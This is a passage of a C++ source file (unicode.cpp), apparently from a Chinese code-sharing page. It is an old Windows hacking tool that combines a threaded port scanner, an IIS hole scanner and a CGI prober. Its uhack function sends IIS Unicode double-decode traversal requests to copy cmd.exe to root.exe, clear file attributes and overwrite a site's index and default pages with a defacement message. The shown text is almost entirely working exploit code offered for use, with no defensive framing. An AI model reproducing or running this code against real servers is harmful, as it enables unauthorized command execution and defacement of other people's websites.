📄 unicode.cpp
字号:
cout<<" must have unicode hole or codered virus"<<endl;
cout<<"Example: "<<prog<<" -p"<<" 3389 192.168.0.1 192.168.0.255"<<endl;
cout<<" "<<prog<<" -cgi 192.168.0.1"<<endl;
cout<<" "<<prog<<" -ftp 192.168.0.1 192.168.0.255 -admin"<<endl;
cout<<" "<<prog<<" -idq 192.168.0.1 192.168.0.255 "<<endl;
cout<<" "<<prog<<" -codered 192.168.0.1 198.168.0.255"<<endl;
return;
}
//标准端口扫描函数
UINT pscan(LPVOID port)
{
int portipaddr=portip;
SOCKET s;
struct fd_set mask;
struct timeval timeout;
struct sockaddr_in server;
s=socket(AF_INET,SOCK_STREAM,0);
if (s==INVALID_SOCKET)
{cout<<"Socket() Error:"<<WSAGetLastError()<<endl;
maxthread--;
return -1;
}
server.sin_family=AF_INET;
server.sin_addr.s_addr=htonl(portipaddr);
if (ptop==true)//如果是端口到端口扫描则直接接受端口号
server.sin_port=htons(short(port));
else
server.sin_port=htons(short(atoi((char*)port)));
//显示进度
if (searchend<=searchnumber+1&&searchnumber!=0)
{
cout<<(searchend)*100/(searchnumber+1)<<"% Complete.\r";
}
//设置套接字为非阻塞模式
unsigned long flag=1;
if (ioctlsocket(s,FIONBIO,&flag)!=0)
{cout<<"ioctlsocket error"<<WSAGetLastError()<<endl;
maxthread--;
closesocket(s);
return -1;
}
connect(s,(struct sockaddr *)&server,sizeof(server));
timeout.tv_sec=3; // 超时限制为2秒
timeout.tv_usec=0;
FD_ZERO(& mask); //清空集合mask
FD_SET(s,& mask); //将sockfd放入集合mask中
switch(select(s+1,NULL,& mask,NULL,&timeout))
{
case -1: {cout<<"select error"<<endl;maxthread--;return -1;}
case 0: {maxthread--;closesocket(s);return -1;}//如果超时
default:
if(FD_ISSET(s,& mask))
{
shutdown(s,0);
//设置格式输出
cout<<inet_ntoa(server.sin_addr)<<" Port:"<<ntohs(server.sin_port)<<" listening"<<endl;
myf<<inet_ntoa(server.sin_addr)<<" Port:"<<ntohs(server.sin_port)<<" listening"<<endl;
WaitForSingleObject(HMUTEX,INFINITE);
ok++;
ReleaseMutex(HMUTEX);
closesocket(s);
maxthread--;
return 0;
}
}
return 0;
}
int uhack(char *ip)
{
bool copyfile=false,uhack=false;
char mymessage[200];
char * str="GET /scripts/root.exe?/c+echo+^<body+bgcolor%3d#000000+text%3d#FF0000^>^<p+align%3dcenter^>";
char * copycmd="GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+copy+c:\\winnt\\system32\\cmd.exe+root.exe\r\n";
char * copydcmd="GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+copy+d:\\winnt\\system32\\cmd.exe+root.exe\r\n";
char * attrib="GET /scripts/..%255c%255c../winnt/system32/attrib.exe?+-r+-h+-s+-a+";
SOCKET s;
sockaddr_in server;
char recvbuf[1024];
s=socket(AF_INET,SOCK_STREAM,0);
if (s==INVALID_SOCKET)
{cout<<"socket error"<<endl;
return -1;}
server.sin_family=AF_INET;
server.sin_addr.s_addr=inet_addr(ip);
server.sin_port=htons(80);
if (connect(s,(struct sockaddr *)&server,sizeof(server))==SOCKET_ERROR)
{cout<<"connect error"<<endl;
return -1;}
//发送拷贝文件命令
if (send(s,copycmd,strlen(copycmd),0)==SOCKET_ERROR)
{cout<<"send error"<<WSAGetLastError()<<endl;
return -1;}
if (recv(s,recvbuf,1024,0)==SOCKET_ERROR)
{cout<<"recv2 error"<<WSAGetLastError()<<endl;
return -1;}
if (strstr(recvbuf,"1 file(s) copied."))
copyfile=true;
closesocket(s);
s=socket(AF_INET,SOCK_STREAM,0);
if (connect(s,(struct sockaddr *)&server,sizeof(server))==SOCKET_ERROR)
{cout<<"connect error"<<endl;
return -1;}
if (send(s,copydcmd,strlen(copydcmd),0)==SOCKET_ERROR)
{cout<<"send error"<<WSAGetLastError()<<endl;
return -1;}
if (recv(s,recvbuf,1024,0)==SOCKET_ERROR)
{cout<<"recv2 error"<<WSAGetLastError()<<endl;
return -1;}
if (strstr(recvbuf,"1 file(s) copied."))
copyfile=true;
if (copyfile==true)
cout<<"Copy cmd.exe to root.exe.....done."<<endl;
//else
//{cout<<"Copy cmd.exe to root.exe.....fail."<<endl;
// closesocket(s);
// return -1;}
//发送修改文件属性命令
closesocket(s);
s=socket(AF_INET,SOCK_STREAM,0);
if (connect(s,(struct sockaddr *)&server,sizeof(server))==SOCKET_ERROR)
{cout<<"connect error"<<endl;
return -1;}
strcpy(mymessage,attrib);
strcat(mymessage,webpath);
strcat(mymessage,"\\*.*\r\n");
if (send(s,mymessage,strlen(mymessage)+1,0)==SOCKET_ERROR)
{cout<<"send error"<<WSAGetLastError()<<endl;
return -1;}
//发送修改页面命令
for (int i=0;i<4;i++)
{ closesocket(s);
strcpy(mymessage,str);
strcat(mymessage,message);
strcat(mymessage,"^</p^>+>");
strcat(mymessage,webpath);
strcat(mymessage,modify[i]);
s=socket(AF_INET,SOCK_STREAM,0);
if (connect(s,(struct sockaddr *)&server,sizeof(server))==SOCKET_ERROR)
{cout<<"connect error"<<endl;
return -1;}
if (send(s,mymessage,200,0)==SOCKET_ERROR)
{cout<<"send error"<<WSAGetLastError()<<endl;
return -1;}
memset(recvbuf,NULL,strlen(recvbuf)-1);
if (recv(s,recvbuf,1000,0)==SOCKET_ERROR)
{cout<<"recv error"<<WSAGetLastError()<<endl;
return -1;}
//cout<<recvbuf;
if (!((strstr(recvbuf,"cannot find the path"))||(strstr(recvbuf,"Access is denied."))||(strstr(recvbuf,"404"))||(strstr(recvbuf,"500"))))
{
switch (i)
{case 0: cout<<"Modify index.htm.............done."<<endl;break;
case 1: cout<<"Modify index.asp.............done."<<endl;break;
case 2: cout<<"Modify default.htm...........done."<<endl;break;
case 3: cout<<"Modify default.asp...........done."<<endl;break;
}
uhack=true;
}
else
{if (strstr(recvbuf,"cannot find the path"))
cout<<"Cantnot find the path '"<<webpath<<"'."<<endl;
if (strstr(recvbuf,"Access is denied."))
cout<<"Access is denied."<<endl;}
if (strstr(recvbuf,"404")||strstr(recvbuf,"500"))
cout<<"Not found root.exe."<<endl;
}
closesocket(s);
s=socket(AF_INET,SOCK_STREAM,0);
if (connect(s,(struct sockaddr *)&server,sizeof(server))==SOCKET_ERROR)
{cout<<"connect error"<<endl;
return -1;}
//if (send(s,modify[4],200,0)!=SOCKET_ERROR)
// cout<<"Delete root.exe..............done."<<endl;
closesocket(s);
if (uhack==true)
cout<<endl<<" Modify complete!"<<endl;
else cout<<endl<<" Modify fail."<<endl;
return 0;
}
//扫描iis漏洞
UINT iisscan(LPVOID ip)
{
int ipaddr=int(ip);
char recvbuf[100];
SOCKET s;
struct sockaddr_in server;
s=socket(AF_INET,SOCK_STREAM,0);
if (s==INVALID_SOCKET){cout<<"Socket() Error:"<<WSAGetLastError()<<endl;maxthread--;return -1;}
server.sin_family=AF_INET;
server.sin_addr.s_addr=htonl(ipaddr);
server.sin_port=htons(80);
//设置套接字为非阻塞模式
struct fd_set mask;
struct timeval timeout;
unsigned long flag=1;
//显示进度
if (searchend<=searchnumber+1&&searchnumber!=0)
{
cout<<(searchend*100)/(searchnumber)<<"% Complete.\r";
}
//设置套接字为非足塞模式
if (ioctlsocket(s,FIONBIO,&flag)!=0)
{cout<<"ioctlsocket error"<<WSAGetLastError()<<endl;
maxthread--;
closesocket(s);
return -1;
}
connect(s,(struct sockaddr *)&server,sizeof(server));
timeout.tv_sec=3; // 超时限制为2秒
timeout.tv_usec=0;
FD_ZERO(& mask); //清空集合mask
FD_SET(s,& mask); //将sockfd放入集合mask中
switch(select(s+1,NULL,&mask,NULL,&timeout))
{
case -1: {cout<<"select error"<<endl;closesocket(s);maxthread--;return -1;}
case 0: {maxthread--;closesocket(s);return -1;}//如果超时
default:
if(FD_ISSET(s,& mask))
{
if (send(s,sendbuf,strlen(sendbuf),0)==SOCKET_ERROR)
{ maxthread--;return -1;}
for (int i=0;i<10;i++)
{
if (recv(s,recvbuf,100,0)==SOCKET_ERROR)
{ if (WSAGetLastError()==10035) {Sleep(200);continue;}
else
{//cout<<inet_ntoa(server.sin_addr)<<"recv error"<<WSAGetLastError()<<endl;
maxthread--;
closesocket(s);
return -1;
}
}
break;
}
if (strstr(recvbuf,checkhole))
{
cout<<inet_ntoa(server.sin_addr)<<iisholemessage<<endl;
myf<<inet_ntoa(server.sin_addr)<<iisholemessage<<endl;
WaitForSingleObject(HMUTEX,INFINITE);
ok++;
ReleaseMutex(HMUTEX);
}
}
}
maxthread--;
closesocket(s);
return 0;
}
//cgi漏洞测试程序
UINT cgiscan(LPVOID cgistr)
{
char sendbuf[100];
strcpy(sendbuf,"GET ");
strcat(sendbuf,(char*)cgistr);
strcat(sendbuf,"\r\n");
char recvbuf[100];
SOCKET s;
struct sockaddr_in server;
s=socket(AF_INET,SOCK_STREAM,0);
if (s==INVALID_SOCKET){cout<<"Socket() Error:"<<WSAGetLastError()<<(char*)cgistr<<endl;return -1;}
server.sin_family=AF_INET;
server.sin_addr.s_addr=inet_addr(uhackip);
server.sin_port=htons(80);
//显示进度
if (searchend<=searchnumber+1&&searchnumber!=0)
{
cout<<(searchend)*100/(searchnumber+1)<<"% Complete.\r";
}
//设置套接字为非阻塞模式
struct fd_set mask;
struct timeval timeout;
unsigned long flag=1;
if (ioctlsocket(s,FIONBIO,&flag)!=0)
{cout<<"ioctlsocket error"<<WSAGetLastError()<<endl;
maxthread--;
closesocket(s);
return -1;
}
connect(s,(struct sockaddr *)&server,sizeof(server));
timeout.tv_sec=3; // 超时限制为2秒
timeout.tv_usec=0;
FD_ZERO(& mask); //清空集合mask
FD_SET(s,& mask); //将sockfd放入集合mask中
switch(select(s+1,NULL,&mask,NULL,&timeout))
{
case -1: {closesocket(s);maxthread--;return -1;}
case 0: {maxthread--;closesocket(s);return -1;}//如果超时
default:
if(FD_ISSET(s,& mask))
{
if (send(s,sendbuf,strlen(sendbuf),0)==SOCKET_ERROR)
{ cout<<"send error"<<endl;
closesocket(s);
maxthread--;return -1;
}
for (;;)
{
if (recv(s,recvbuf,100,0)==SOCKET_ERROR)
{
if (WSAGetLastError()==10035) {Sleep(1000);continue;}
else
{
cout<<inet_ntoa(server.sin_addr)<<"recv error"<<WSAGetLastError()<<(char*)cgistr<<endl;
maxthread--;
closesocket(s);
return -1;
}
}
break;
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -